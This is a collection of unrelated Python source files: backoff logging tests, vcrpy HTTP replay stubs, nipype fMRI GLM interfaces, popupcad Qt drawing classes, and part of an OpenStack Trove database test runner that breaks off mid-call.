def test_on_exception_logger_none(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('backoff')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3, logger=None)
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert not caplog.records
def test_on_exception_logger_user(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('my-logger')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3, logger=logger)
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert len(caplog.records) == 3 # 2 backoffs and 1 giveup
for record in caplog.records:
assert record.name == 'my-logger'
def test_on_exception_logger_user_str(monkeypatch, caplog):
monkeypatch.setattr('time.sleep', lambda x: None)
logger = logging.getLogger('my-logger')
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
@backoff.on_exception(backoff.expo, KeyError, max_tries=3,
logger='my-logger')
def key_error():
raise KeyError()
with caplog.at_level(logging.INFO):
with pytest.raises(KeyError):
key_error()
assert len(caplog.records) == 3 # 2 backoffs and 1 giveup
for record in caplog.records:
assert record.name == 'my-logger'
def _on_exception_factory(
backoff_log_level, giveup_log_level, max_tries
):
@backoff.on_exception(
backoff.expo,
ValueError,
max_tries=max_tries,
backoff_log_level=backoff_log_level,
giveup_log_level=giveup_log_level,
)
def value_error():
raise ValueError
def func():
with pytest.raises(ValueError):
value_error()
return func
def _on_predicate_factory(
backoff_log_level, giveup_log_level, max_tries
):
@backoff.on_predicate(
backoff.expo,
max_tries=max_tries,
backoff_log_level=backoff_log_level,
giveup_log_level=giveup_log_level,
)
def func():
return False
return func
@pytest.mark.parametrize(
("func_factory", "backoff_log_level", "giveup_log_level"),
(
(factory, backoff_log_level, giveup_log_level)
for backoff_log_level, giveup_log_level in itertools.product(
(
logging.DEBUG,
logging.INFO,
logging.WARNING,
logging.ERROR,
logging.CRITICAL,
),
repeat=2,
)
for factory in (_on_predicate_factory, _on_exception_factory)
)
)
def test_event_log_levels(
caplog, func_factory, backoff_log_level, giveup_log_level
):
max_tries = 3
func = func_factory(backoff_log_level, giveup_log_level, max_tries)
with unittest.mock.patch('time.sleep', return_value=None):
with caplog.at_level(
min(backoff_log_level, giveup_log_level), logger="backoff"
):
func()
backoff_re = re.compile("backing off", re.IGNORECASE)
giveup_re = re.compile("giving up", re.IGNORECASE)
backoff_log_count = 0
giveup_log_count = 0
for logger_name, level, message in caplog.record_tuples:
if level == backoff_log_level and backoff_re.match(message):
backoff_log_count += 1
elif level == giveup_log_level and giveup_re.match(message):
giveup_log_count += 1
assert backoff_log_count == max_tries - 1
assert giveup_log_count == 1
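# The decorators exercised by these tests are used the same way in application
# code. A minimal sketch (assumes the `requests` library is installed; the URL
# is a placeholder): retry on any RequestException with exponential backoff
# and give up after five attempts.
#
#     import backoff
#     import requests
#
#     @backoff.on_exception(backoff.expo,
#                           requests.exceptions.RequestException,
#                           max_tries=5)
#     def fetch(url):
#         return requests.get(url, timeout=10)
#
#     fetch('https://example.com/api')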
|
|
'''Stubs for patching HTTP and HTTPS requests'''
import logging
import six
from six.moves.http_client import (
HTTPConnection,
HTTPSConnection,
HTTPResponse,
)
from six import BytesIO
from vcr.request import Request
from vcr.errors import CannotOverwriteExistingCassetteException
from . import compat
log = logging.getLogger(__name__)
class VCRFakeSocket(object):
"""
A socket that doesn't do anything!
    Used when playing back cassettes, when there
is no actual open socket.
"""
def close(self):
pass
def settimeout(self, *args, **kwargs):
pass
def fileno(self):
"""
This is kinda crappy. requests will watch
this descriptor and make sure it's not closed.
Return file descriptor 0 since that's stdin.
"""
return 0 # wonder how bad this is....
def parse_headers(header_list):
"""
Convert headers from our serialized dict with lists for keys to a
HTTPMessage
"""
header_string = b""
for key, values in header_list.items():
for v in values:
header_string += \
key.encode('utf-8') + b":" + v.encode('utf-8') + b"\r\n"
return compat.get_httpmessage(header_string)
def serialize_headers(response):
out = {}
for key, values in compat.get_headers(response.msg):
out.setdefault(key, [])
out[key].extend(values)
return out
class VCRHTTPResponse(HTTPResponse):
"""
    Stub response class that gets returned instead of an HTTPResponse
"""
def __init__(self, recorded_response):
self.recorded_response = recorded_response
self.reason = recorded_response['status']['message']
self.status = self.code = recorded_response['status']['code']
self.version = None
self._content = BytesIO(self.recorded_response['body']['string'])
self._closed = False
headers = self.recorded_response['headers']
# Since we are loading a response that has already been serialized, our
# response is no longer chunked. That means we don't want any
# libraries trying to process a chunked response. By removing the
# transfer-encoding: chunked header, this should cause the downstream
# libraries to process this as a non-chunked response.
te_key = [h for h in headers.keys() if h.upper() == 'TRANSFER-ENCODING']
if te_key:
del headers[te_key[0]]
self.headers = self.msg = parse_headers(headers)
self.length = compat.get_header(self.msg, 'content-length') or None
@property
def closed(self):
        # in python3, I can't change the value of self.closed. So I'm
        # twiddling self._closed and using this property to shadow the real
        # self.closed from the superclass
return self._closed
def read(self, *args, **kwargs):
return self._content.read(*args, **kwargs)
def readline(self, *args, **kwargs):
return self._content.readline(*args, **kwargs)
def close(self):
self._closed = True
return True
def getcode(self):
return self.status
def isclosed(self):
return self.closed
def info(self):
return parse_headers(self.recorded_response['headers'])
def getheaders(self):
message = parse_headers(self.recorded_response['headers'])
return list(compat.get_header_items(message))
def getheader(self, header, default=None):
values = [v for (k, v) in self.getheaders() if k.lower() == header.lower()]
if values:
return ', '.join(values)
else:
return default
class VCRConnection(object):
# A reference to the cassette that's currently being patched in
cassette = None
def _port_postfix(self):
"""
Returns empty string for the default port and ':port' otherwise
"""
port = self.real_connection.port
default_port = {'https': 443, 'http': 80}[self._protocol]
return ':{0}'.format(port) if port != default_port else ''
def _uri(self, url):
"""Returns request absolute URI"""
uri = "{0}://{1}{2}{3}".format(
self._protocol,
self.real_connection.host,
self._port_postfix(),
url,
)
return uri
def _url(self, uri):
"""Returns request selector url from absolute URI"""
prefix = "{0}://{1}{2}".format(
self._protocol,
self.real_connection.host,
self._port_postfix(),
)
return uri.replace(prefix, '', 1)
def request(self, method, url, body=None, headers=None):
'''Persist the request metadata in self._vcr_request'''
self._vcr_request = Request(
method=method,
uri=self._uri(url),
body=body,
headers=headers or {}
)
log.debug('Got {0}'.format(self._vcr_request))
# Note: The request may not actually be finished at this point, so
# I'm not sending the actual request until getresponse(). This
# allows me to compare the entire length of the response to see if it
# exists in the cassette.
def putrequest(self, method, url, *args, **kwargs):
"""
httplib gives you more than one way to do it. This is a way
to start building up a request. Usually followed by a bunch
of putheader() calls.
"""
self._vcr_request = Request(
method=method,
uri=self._uri(url),
body="",
headers={}
)
log.debug('Got {0}'.format(self._vcr_request))
def putheader(self, header, *values):
self._vcr_request.headers[header] = values
def send(self, data):
'''
This method is called after request(), to add additional data to the
body of the request. So if that happens, let's just append the data
onto the most recent request in the cassette.
'''
self._vcr_request.body = self._vcr_request.body + data \
if self._vcr_request.body else data
def close(self):
# Note: the real connection will only close if it's open, so
# no need to check that here.
self.real_connection.close()
def endheaders(self, message_body=None):
"""
Normally, this would actually send the request to the server.
We are not sending the request until getting the response,
so bypass this part and just append the message body, if any.
"""
if message_body is not None:
self._vcr_request.body = message_body
def getresponse(self, _=False, **kwargs):
'''Retrieve the response'''
# Check to see if the cassette has a response for this request. If so,
# then return it
if self.cassette.can_play_response_for(self._vcr_request):
log.info(
"Playing response for {0} from cassette".format(
self._vcr_request
)
)
response = self.cassette.play_response(self._vcr_request)
return VCRHTTPResponse(response)
else:
if self.cassette.write_protected and self.cassette.filter_request(
self._vcr_request
):
raise CannotOverwriteExistingCassetteException(
"No match for the request (%r) was found. "
"Can't overwrite existing cassette (%r) in "
"your current record mode (%r)."
% (self._vcr_request, self.cassette._path,
self.cassette.record_mode)
)
# Otherwise, we should send the request, then get the response
# and return it.
log.info(
"{0} not in cassette, sending to real server".format(
self._vcr_request
)
)
# This is imported here to avoid circular import.
# TODO(@IvanMalison): Refactor to allow normal import.
from vcr.patch import force_reset
with force_reset():
self.real_connection.request(
method=self._vcr_request.method,
url=self._url(self._vcr_request.uri),
body=self._vcr_request.body,
headers=self._vcr_request.headers,
)
# get the response
response = self.real_connection.getresponse()
# put the response into the cassette
response = {
'status': {
'code': response.status,
'message': response.reason
},
'headers': serialize_headers(response),
'body': {'string': response.read()},
}
self.cassette.append(self._vcr_request, response)
return VCRHTTPResponse(response)
def set_debuglevel(self, *args, **kwargs):
self.real_connection.set_debuglevel(*args, **kwargs)
def connect(self, *args, **kwargs):
"""
httplib2 uses this. Connects to the server I'm assuming.
Only pass to the baseclass if we don't have a recorded response
and are not write-protected.
"""
if hasattr(self, '_vcr_request') and \
self.cassette.can_play_response_for(self._vcr_request):
# We already have a response we are going to play, don't
# actually connect
return
if self.cassette.write_protected:
# Cassette is write-protected, don't actually connect
return
return self.real_connection.connect(*args, **kwargs)
@property
def sock(self):
if self.real_connection.sock:
return self.real_connection.sock
return VCRFakeSocket()
@sock.setter
def sock(self, value):
if self.real_connection.sock:
self.real_connection.sock = value
def __init__(self, *args, **kwargs):
if six.PY3:
kwargs.pop('strict', None) # apparently this is gone in py3
# need to temporarily reset here because the real connection
# inherits from the thing that we are mocking out. Take out
# the reset if you want to see what I mean :)
from vcr.patch import force_reset
with force_reset():
self.real_connection = self._baseclass(*args, **kwargs)
def __setattr__(self, name, value):
"""
We need to define this because any attributes that are set on the
        VCRConnection need to be propagated to the real connection.
For example, urllib3 will set certain attributes on the connection,
such as 'ssl_version'. These attributes need to get set on the real
connection to have the correct and expected behavior.
TODO: Separately setting the attribute on the two instances is not
ideal. We should switch to a proxying implementation.
"""
try:
setattr(self.real_connection, name, value)
except AttributeError:
# raised if real_connection has not been set yet, such as when
# we're setting the real_connection itself for the first time
pass
super(VCRConnection, self).__setattr__(name, value)
class VCRHTTPConnection(VCRConnection):
'''A Mocked class for HTTP requests'''
_baseclass = HTTPConnection
_protocol = 'http'
class VCRHTTPSConnection(VCRConnection):
'''A Mocked class for HTTPS requests'''
_baseclass = HTTPSConnection
_protocol = 'https'
is_verified = True
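# These stub classes are swapped in for httplib's HTTPConnection and
# HTTPSConnection while a cassette is in use (see vcr.patch, imported above).
# A minimal usage sketch (the cassette path and URL are placeholders):
#
#     import vcr
#     import requests
#
#     with vcr.use_cassette('fixtures/synopsis.yaml'):
#         # The first run records the real response into the cassette; later
#         # runs replay it through VCRHTTPResponse without opening a socket.
#         response = requests.get('http://www.iana.org/domains/reserved')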
|
|
import warnings
import os
import nibabel as nb
import numpy as np
from nipype.external import six
from ...utils.misc import package_check
have_nipy = True
try:
package_check('nipy')
except Exception:
have_nipy = False
else:
import nipy.modalities.fmri.design_matrix as dm
import nipy.labs.glm.glm as GLM
if have_nipy:
try:
BlockParadigm = dm.BlockParadigm
except AttributeError:
from nipy.modalities.fmri.experimental_paradigm import BlockParadigm
from ..base import (BaseInterface, TraitedSpec, traits, File, OutputMultiPath,
BaseInterfaceInputSpec, isdefined)
class FitGLMInputSpec(BaseInterfaceInputSpec):
    session_info = traits.List(minlen=1, maxlen=1, mandatory=True,
                               desc=('Session specific information generated by'
                                     ' ``modelgen.SpecifyModel``, FitGLM does '
                                     'not support multiple runs unless they are '
                                     'concatenated (see SpecifyModel options)'))
    hrf_model = traits.Enum('Canonical', 'Canonical With Derivative', 'FIR',
                            desc=("string that specifies the hemodynamic response "
                                  "function; it can be 'Canonical', 'Canonical "
                                  "With Derivative' or 'FIR'"), usedefault=True)
drift_model = traits.Enum("Cosine", "Polynomial", "Blank",
desc = ("string that specifies the desired drift "
"model, to be chosen among 'Polynomial', "
"'Cosine', 'Blank'"), usedefault=True)
TR = traits.Float(mandatory=True)
model = traits.Enum("ar1", "spherical",
desc=("autoregressive mode is available only for the "
"kalman method"), usedefault=True)
method = traits.Enum("kalman", "ols",
desc=("method to fit the model, ols or kalma; kalman "
"is more time consuming but it supports "
"autoregressive model"), usedefault=True)
mask = traits.File(exists=True,
desc=("restrict the fitting only to the region defined "
"by this mask"))
normalize_design_matrix = traits.Bool(False,
desc=("normalize (zscore) the "
"regressors before fitting"),
usedefault=True)
save_residuals = traits.Bool(False, usedefault=True)
plot_design_matrix = traits.Bool(False, usedefault=True)
class FitGLMOutputSpec(TraitedSpec):
beta = File(exists=True)
nvbeta = traits.Any()
s2 = File(exists=True)
dof = traits.Any()
constants = traits.Any()
axis = traits.Any()
reg_names = traits.List()
residuals = traits.File()
a = File(exists=True)
class FitGLM(BaseInterface):
'''
Fit GLM model based on the specified design. Supports only single or concatenated runs.
'''
input_spec = FitGLMInputSpec
output_spec = FitGLMOutputSpec
def _run_interface(self, runtime):
session_info = self.inputs.session_info
functional_runs = self.inputs.session_info[0]['scans']
if isinstance(functional_runs, six.string_types):
functional_runs = [functional_runs]
nii = nb.load(functional_runs[0])
data = nii.get_data()
if isdefined(self.inputs.mask):
mask = nb.load(self.inputs.mask).get_data() > 0
else:
mask = np.ones(nii.shape[:3]) == 1
timeseries = data.copy()[mask,:]
del data
for functional_run in functional_runs[1:]:
nii = nb.load(functional_run)
data = nii.get_data()
npdata = data.copy()
del data
timeseries = np.concatenate((timeseries,npdata[mask,:]), axis=1)
del npdata
nscans = timeseries.shape[1]
if 'hpf' in session_info[0].keys():
hpf = session_info[0]['hpf']
drift_model=self.inputs.drift_model
else:
hpf=0
drift_model = "Blank"
reg_names = []
for reg in session_info[0]['regress']:
reg_names.append(reg['name'])
reg_vals = np.zeros((nscans,len(reg_names)))
for i in range(len(reg_names)):
reg_vals[:,i] = np.array(session_info[0]['regress'][i]['val']).reshape(1,-1)
frametimes= np.linspace(0, (nscans-1)*self.inputs.TR, nscans)
conditions = []
onsets = []
duration = []
for i,cond in enumerate(session_info[0]['cond']):
onsets += cond['onset']
conditions += [cond['name']]*len(cond['onset'])
if len(cond['duration']) == 1:
duration += cond['duration']*len(cond['onset'])
else:
duration += cond['duration']
if conditions:
paradigm = BlockParadigm(con_id=conditions, onset=onsets, duration=duration)
else:
paradigm = None
design_matrix, self._reg_names = dm.dmtx_light(frametimes, paradigm, drift_model=drift_model, hfcut=hpf,
hrf_model=self.inputs.hrf_model,
add_regs=reg_vals,
add_reg_names=reg_names
)
if self.inputs.normalize_design_matrix:
for i in range(len(self._reg_names)-1):
design_matrix[:,i] = (design_matrix[:,i]-design_matrix[:,i].mean())/design_matrix[:,i].std()
if self.inputs.plot_design_matrix:
import pylab
pylab.pcolor(design_matrix)
pylab.savefig("design_matrix.pdf")
pylab.close()
pylab.clf()
glm = GLM.glm()
glm.fit(timeseries.T, design_matrix, method=self.inputs.method, model=self.inputs.model)
self._beta_file = os.path.abspath("beta.nii")
beta = np.zeros(mask.shape + (glm.beta.shape[0],))
beta[mask,:] = glm.beta.T
nb.save(nb.Nifti1Image(beta, nii.get_affine()), self._beta_file)
self._s2_file = os.path.abspath("s2.nii")
s2 = np.zeros(mask.shape)
s2[mask] = glm.s2
nb.save(nb.Nifti1Image(s2, nii.get_affine()), self._s2_file)
if self.inputs.save_residuals:
explained = np.dot(design_matrix,glm.beta)
residuals = np.zeros(mask.shape + (nscans,))
residuals[mask,:] = timeseries - explained.T
self._residuals_file = os.path.abspath("residuals.nii")
nb.save(nb.Nifti1Image(residuals, nii.get_affine()), self._residuals_file)
self._nvbeta = glm.nvbeta
self._dof = glm.dof
self._constants = glm._constants
self._axis = glm._axis
if self.inputs.model == "ar1":
self._a_file = os.path.abspath("a.nii")
a = np.zeros(mask.shape)
a[mask] = glm.a.squeeze()
nb.save(nb.Nifti1Image(a, nii.get_affine()), self._a_file)
self._model = glm.model
self._method = glm.method
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs["beta"] = self._beta_file
outputs["nvbeta"] = self._nvbeta
outputs["s2"] = self._s2_file
outputs["dof"] = self._dof
outputs["constants"] = self._constants
outputs["axis"] = self._axis
outputs["reg_names"] = self._reg_names
if self.inputs.model == "ar1":
outputs["a"] = self._a_file
if self.inputs.save_residuals:
outputs["residuals"] = self._residuals_file
return outputs
class EstimateContrastInputSpec(BaseInterfaceInputSpec):
contrasts = traits.List(
traits.Either(traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float)),
traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float),
traits.List(traits.Float)),
traits.Tuple(traits.Str,
traits.Enum('F'),
traits.List(traits.Either(traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float)),
traits.Tuple(traits.Str,
traits.Enum('T'),
traits.List(traits.Str),
traits.List(traits.Float),
traits.List(traits.Float)))))),
desc="""List of contrasts with each contrast being a list of the form:
[('name', 'stat', [condition list], [weight list], [session list])]. if
session list is None or not provided, all sessions are used. For F
contrasts, the condition list should contain previously defined
T-contrasts.""", mandatory=True)
beta = File(exists=True, desc="beta coefficients of the fitted model",mandatory=True)
nvbeta = traits.Any(mandatory=True)
s2 = File(exists=True, desc="squared variance of the residuals",mandatory=True)
dof = traits.Any(desc="degrees of freedom", mandatory=True)
constants = traits.Any(mandatory=True)
axis = traits.Any(mandatory=True)
reg_names = traits.List(mandatory=True)
mask = traits.File(exists=True)
class EstimateContrastOutputSpec(TraitedSpec):
stat_maps = OutputMultiPath(File(exists=True))
z_maps = OutputMultiPath(File(exists=True))
p_maps = OutputMultiPath(File(exists=True))
class EstimateContrast(BaseInterface):
'''
Estimate contrast of a fitted model.
'''
input_spec = EstimateContrastInputSpec
output_spec = EstimateContrastOutputSpec
def _run_interface(self, runtime):
beta_nii = nb.load(self.inputs.beta)
if isdefined(self.inputs.mask):
mask = nb.load(self.inputs.mask).get_data() > 0
else:
mask = np.ones(beta_nii.shape[:3]) == 1
glm = GLM.glm()
nii = nb.load(self.inputs.beta)
glm.beta = beta_nii.get_data().copy()[mask,:].T
glm.nvbeta = self.inputs.nvbeta
glm.s2 = nb.load(self.inputs.s2).get_data().copy()[mask]
glm.dof = self.inputs.dof
glm._axis = self.inputs.axis
glm._constants = self.inputs.constants
reg_names = self.inputs.reg_names
self._stat_maps = []
self._p_maps = []
self._z_maps = []
for contrast_def in self.inputs.contrasts:
name = contrast_def[0]
_ = contrast_def[1]
contrast = np.zeros(len(reg_names))
for i, reg_name in enumerate(reg_names):
if reg_name in contrast_def[2]:
idx = contrast_def[2].index(reg_name)
contrast[i] = contrast_def[3][idx]
est_contrast = glm.contrast(contrast)
stat_map = np.zeros(mask.shape)
stat_map[mask] = est_contrast.stat().T
stat_map_file = os.path.abspath(name + "_stat_map.nii")
nb.save(nb.Nifti1Image(stat_map, nii.get_affine()), stat_map_file)
self._stat_maps.append(stat_map_file)
p_map = np.zeros(mask.shape)
p_map[mask] = est_contrast.pvalue().T
p_map_file = os.path.abspath(name + "_p_map.nii")
nb.save(nb.Nifti1Image(p_map, nii.get_affine()), p_map_file)
self._p_maps.append(p_map_file)
z_map = np.zeros(mask.shape)
z_map[mask] = est_contrast.zscore().T
z_map_file = os.path.abspath(name + "_z_map.nii")
nb.save(nb.Nifti1Image(z_map, nii.get_affine()), z_map_file)
self._z_maps.append(z_map_file)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs["stat_maps"] = self._stat_maps
outputs["p_maps"] = self._p_maps
outputs["z_maps"] = self._z_maps
return outputs
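# A minimal usage sketch with hypothetical values; ``session_info`` would
# normally come from ``modelgen.SpecifyModel`` as described in the input spec.
#
#     fit = FitGLM()
#     fit.inputs.session_info = session_info  # output of SpecifyModel
#     fit.inputs.TR = 2.0
#     fit.inputs.model = 'ar1'
#     fit.inputs.method = 'kalman'
#     results = fit.run()
#
#     est = EstimateContrast()
#     est.inputs.contrasts = [('task>rest', 'T', ['task'], [1.0])]
#     est.inputs.beta = results.outputs.beta
#     est.inputs.s2 = results.outputs.s2
#     est.inputs.nvbeta = results.outputs.nvbeta
#     est.inputs.dof = results.outputs.dof
#     est.inputs.constants = results.outputs.constants
#     est.inputs.axis = results.outputs.axis
#     est.inputs.reg_names = results.outputs.reg_names
#     est.run()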
|
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes.
Email: danaukes<at>seas.harvard.edu.
Please see LICENSE.txt for full license.
"""
import PySide.QtCore as qc
import PySide.QtGui as qg
from popupcad.graphics2d.graphicsitems import Common, CommonShape
from popupcad.geometry.vertex import ShapeVertex
from popupcad.filetypes.genericshapes import GenericPoly, GenericPolyline, GenericLine, GenericCircle, GenericTwoPointRect
import popupcad
class Proto(Common):
z_value = 20
isDeletable = True
minradius = 20
basicpen = qg.QPen(
qg.QColor.fromRgbF(
0,
0,
0,
1),
1.0,
qc.Qt.SolidLine,
qc.Qt.RoundCap,
qc.Qt.RoundJoin)
basicpen.setCosmetic(True)
basicbrush = qg.QBrush(
qg.QColor.fromRgbF(
1, 1, 0, .25), qc.Qt.SolidPattern)
nobrush = qc.Qt.NoBrush
def __init__(self, *args, **kwargs):
super(Proto, self).__init__(*args, **kwargs)
self.setZValue(self.z_value)
self.generic = self.shape_class([], [], False)
self.temphandle = None
self.setAcceptHoverEvents(True)
self.setFlag(self.ItemIsMovable, True)
self.setFlag(self.ItemIsSelectable, True)
self.setFlag(self.ItemIsFocusable, True)
self.setPen(self.basicpen)
self.setBrush(self.basicbrush)
def painterpath(self):
ep = self.exteriorpoints(popupcad.view_scaling)
ip = self.generic.interiorpoints(scaling=popupcad.view_scaling)
return self.generic.gen_painterpath(ep, ip)
def exteriorpoints(self,scaling=1):
ep = self.generic.exteriorpoints(scaling=scaling)
if self.temphandle is not None:
ep.append(
self.temphandle.generic.getpos(scaling=scaling))
return ep
def deltemphandle(self):
        if self.temphandle:
self.temphandle.setParentItem(None)
del self.temphandle
self.temphandle = None
def checkdist(self, point0, point1):
return not popupcad.algorithms.points.twopointsthesame(
point0,
point1,
self.minradius /
self.scene().views()[0].zoom())
def finish_definition(self):
scene = self.scene()
self.deltemphandle()
scene.addItem(self.generic.outputinteractive())
self.harddelete()
scene.childfinished()
def mousedoubleclick(self, point):
if self.generic.is_valid_bool():
self.finish_definition()
self.updateshape()
def mouserelease(self, point):
pass
def mousemove(self, point):
import numpy
point = tuple(numpy.array(point.toTuple()) / popupcad.view_scaling)
        if self.temphandle:
self.temphandle.generic.setpos(point)
self.temphandle.updateshape()
self.updateshape()
class ProtoMultiPoint(Proto):
def addhandle(self, handle):
if self.generic.len_exterior() == 0:
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
else:
if handle.generic.getpos(scaling=popupcad.view_scaling) != self.generic.get_exterior(
)[-1].getpos(scaling=popupcad.view_scaling):
if self.checkdist(handle.generic.getpos(scaling=popupcad.view_scaling),
self.generic.get_exterior()[-1].getpos(scaling=popupcad.view_scaling)):
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
def mousepress(self, point):
import numpy
point = tuple(numpy.array(point.toTuple()) / popupcad.view_scaling)
if not self.temphandle:
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
self.addhandle(self.temphandle)
else:
self.addhandle(self.temphandle)
if not self.temphandle:
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
self.updateshape()
# def mousedoubleclick(self, point):
# if self.generic.csg_valid() and self.generic.isValid():
# if self.generic.len_exterior() > 2:
# self.finish_definition()
# self.updateshape()
class ProtoTwoPoint(Proto):
def addhandle(self, handle):
if self.generic.len_exterior() == 0:
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
return True
elif self.generic.len_exterior() == 1:
if handle.pos().toTuple(
) != self.generic.get_exterior()[-1].getpos():
if self.checkdist(handle.generic.getpos(scaling=popupcad.view_scaling),
self.generic.get_exterior()[-1].getpos(scaling=popupcad.view_scaling)):
self.generic.addvertex_exterior(handle.get_generic())
self.temphandle = None
return True
else:
raise Exception
self.temphandle = None
return True
def mousepress(self, point):
import numpy
point = tuple(numpy.array(point.toTuple()) / popupcad.view_scaling)
if not self.temphandle:
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
if self.generic.len_exterior() == 0:
self.addhandle(self.temphandle)
a = ShapeVertex(point)
self.temphandle = a.gen_interactive()
self.temphandle.setParentItem(self)
self.temphandle.updatescale()
self.updateshape()
return
elif self.generic.len_exterior() == 1:
if self.addhandle(self.temphandle):
self.finish_definition()
self.updateshape()
return
else:
return
else:
raise Exception
self.finish_definition()
self.updateshape()
return
self.updateshape()
class ProtoPoly(ProtoMultiPoint, CommonShape, qg.QGraphicsPathItem):
shape_class = GenericPoly
class ProtoPath(ProtoMultiPoint, CommonShape, qg.QGraphicsPathItem):
basicbrush = Proto.nobrush
shape_class = GenericPolyline
class ProtoLine(ProtoTwoPoint, CommonShape, qg.QGraphicsPathItem):
basicbrush = Proto.nobrush
shape_class = GenericLine
class ProtoCircle(ProtoTwoPoint, CommonShape, qg.QGraphicsPathItem):
shape_class = GenericCircle
class ProtoRect2Point(ProtoTwoPoint, CommonShape, qg.QGraphicsPathItem):
shape_class = GenericTwoPointRect
|
|
# Copyright 2015 Tesora Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from proboscis import SkipTest
from trove.common import exception
from trove.common.utils import poll_until
from trove.tests.scenario.runners.test_runners import TestRunner
from troveclient.compat import exceptions
class DatabaseActionsRunner(TestRunner):
def __init__(self):
super(DatabaseActionsRunner, self).__init__()
self.db_defs = []
@property
def first_db_def(self):
if self.db_defs:
return self.db_defs[0]
raise SkipTest("No valid database definitions provided.")
@property
def non_existing_db_def(self):
db_def = self.test_helper.get_non_existing_database_definition()
if db_def:
return db_def
raise SkipTest("No valid database definitions provided.")
def run_databases_create(self, expected_http_code=202):
databases = self.test_helper.get_valid_database_definitions()
if databases:
self.db_defs = self.assert_databases_create(
self.instance_info.id, databases, expected_http_code)
else:
raise SkipTest("No valid database definitions provided.")
def assert_databases_create(self, instance_id, serial_databases_def,
expected_http_code):
self.auth_client.databases.create(instance_id, serial_databases_def)
self.assert_client_code(expected_http_code)
self._wait_for_database_create(instance_id, serial_databases_def)
return serial_databases_def
def run_databases_list(self, expected_http_code=200):
self.assert_databases_list(
self.instance_info.id, self.db_defs, expected_http_code)
def assert_databases_list(self, instance_id, expected_database_defs,
expected_http_code, limit=2):
full_list = self.auth_client.databases.list(instance_id)
self.assert_client_code(expected_http_code)
listed_databases = {database.name: database for database in full_list}
self.assert_is_none(full_list.next,
"Unexpected pagination in the list.")
for database_def in expected_database_defs:
database_name = database_def['name']
self.assert_true(
database_name in listed_databases,
"Database not included in the 'database-list' output: %s" %
database_name)
# Check that the system (ignored) databases are not included in the
# output.
system_databases = self.get_system_databases()
self.assert_false(
any(name in listed_databases for name in system_databases),
"System databases should not be included in the 'database-list' "
"output.")
# Test list pagination.
list_page = self.auth_client.databases.list(instance_id, limit=limit)
self.assert_client_code(expected_http_code)
self.assert_true(len(list_page) <= limit)
if len(full_list) > limit:
self.assert_is_not_none(list_page.next, "List page is missing.")
else:
self.assert_is_none(list_page.next, "An extra page in the list.")
marker = list_page.next
self.assert_pagination_match(list_page, full_list, 0, limit)
if marker:
last_database = list_page[-1]
expected_marker = last_database.name
self.assert_equal(expected_marker, marker,
"Pagination marker should be the last element "
"in the page.")
list_page = self.auth_client.databases.list(
instance_id, marker=marker)
self.assert_client_code(expected_http_code)
self.assert_pagination_match(
list_page, full_list, limit, len(full_list))
def _wait_for_database_create(self, instance_id, expected_database_defs):
expected_db_names = {db_def['name']
for db_def in expected_database_defs}
self.report.log("Waiting for all created databases to appear in the "
"listing: %s" % expected_db_names)
def _all_exist():
all_dbs = self._get_db_names(instance_id)
return all(db in all_dbs for db in expected_db_names)
try:
poll_until(_all_exist, time_out=self.GUEST_CAST_WAIT_TIMEOUT_SEC)
self.report.log("All databases now exist on the instance.")
except exception.PollTimeOut:
self.fail("Some databases were not created within the poll "
"timeout: %ds" % self.GUEST_CAST_WAIT_TIMEOUT_SEC)
def _get_db_names(self, instance_id):
full_list = self.auth_client.databases.list(instance_id)
return {database.name: database for database in full_list}
def run_database_create_with_no_attributes(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_databases_create_failure(
self.instance_info.id, {}, expected_exception, expected_http_code)
def run_database_create_with_blank_name(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_databases_create_failure(
self.instance_info.id, {'name': ''},
expected_exception, expected_http_code)
def run_existing_database_create(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_databases_create_failure(
self.instance_info.id, self.first_db_def,
expected_exception, expected_http_code)
def assert_databases_create_failure(
self, instance_id, serial_databases_def,
expected_exception, expected_http_code):
self.assert_raises(
expected_exception,
expected_http_code,
self.auth_client.databases.create,
instance_id,
serial_databases_def)
def run_system_database_create(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
# TODO(pmalik): Actions on system users and databases should probably
# return Forbidden 403 instead. The current error messages are
# confusing (talking about a malformed request).
system_databases = self.get_system_databases()
database_defs = [{'name': name} for name in system_databases]
if system_databases:
self.assert_databases_create_failure(
self.instance_info.id, database_defs,
expected_exception, expected_http_code)
def run_database_delete(self, expected_http_code=202):
for database_def in self.db_defs:
self.assert_database_delete(
